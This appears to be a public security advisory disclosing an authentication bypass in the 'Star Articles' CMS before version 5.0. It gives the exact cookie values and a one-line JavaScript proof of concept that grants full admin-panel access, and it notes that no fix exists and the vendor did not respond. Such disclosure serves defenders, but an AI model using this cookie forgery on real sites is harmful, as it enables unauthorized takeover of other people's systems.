star-articles-exploit.txt - advisories - Security advisories that I have released to the public.
(HTM) git clone git://jay.scot/advisories
(DIR) Log
(DIR) Files
(DIR) Refs
(DIR) README
---
star-articles-exploit.txt (1289B)
---
1
2
3 Star Articles
4 Insecure Cookie Handling
5 ===========================
6
7
8
9
10 SUMMARY
11 ________
12
13 Ready to use article, news, joke, tutorial site script with
14 more features than you can think of . . . Manage a large
15 collection of articles, jokes , tutorials and anything else
16 for your niche and get features like automatic RSS
17 generation , easy contents syndication , automated link
18 exchange and everything else (Including inbuilt 13 POWERFUL
19 SEO TOOLS)that MAKES YOUR LIFE EASY.
20
21
22 IMPACT
23 _______
24
25 Leads to full administration rights on the CMS admin panel.
26
27
28
29 VERSIONS
30 _________
31
32 Vulnerable systems: Versions prior to 5.0
33
34 Immune systems: None
35
36
37
38 DESCRIPTION #1
39 ______________
40
41 Insecure cookie handling allows anyone to simply create a custom cookie
42 with the values below. This will allow full access to the admin panel.
43
44 Name - admin_user
45 Content - admin
46 Path - /
47
48
49 Proof of Concept:
50 -> javascript:document.cookie="admin_user=admin; path=/"
51
52 Fix:
53 -> None given.
54
55
56
57 ADDITIONAL INFO
58 _______________
59
60
61 Vendor URL - www.stararticles.com
62 Underlying OS - Linux (Any), UNIX (Any), Windows (Any)
63 Credit - Jay Scott
64 Message History - No response from vendor after
65 30 days.
66
67